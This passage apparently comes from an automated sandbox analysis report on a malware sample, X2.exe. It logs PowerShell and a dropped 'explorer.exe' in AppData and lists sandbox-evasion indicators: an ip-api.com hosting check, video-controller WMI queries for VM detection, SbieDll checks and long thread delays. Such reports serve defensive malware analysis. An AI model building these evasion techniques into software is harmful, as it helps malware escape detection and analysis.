Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\X2.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\X2.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: X2.exe, 00000003.00000002.2546617770.0000000002B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: X2.exe, explorer.exe.3.dr	Binary or memory string: SBIEDLL.DLLINFO

Source: C:\Users\user\Desktop\X2.exe	Memory allocated: F90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Memory allocated: 1AB60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory allocated: 810000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory allocated: 1A4C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory allocated: A70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory allocated: 1A440000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory allocated: 14C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory allocated: 1AF90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory allocated: 2130000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory allocated: 1A350000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 597545	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 597325	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 597201	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 596761	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 596637	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 596418	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 594983	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 594874	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 594766	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 594545	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\explorer.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\explorer.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\explorer.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\explorer.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\X2.exe	Window / User API: threadDelayed 6092	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Window / User API: threadDelayed 3758	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6741	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2965	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7449	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2219	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7264	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2348	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8055
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1489

Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -599531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -599312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -599203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -599093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -598984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -598875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -598765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -598656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -598547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -598437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -598219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -598094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -597984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -597766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -597545s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -597325s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -597201s >= -30000s	Jump to behavior
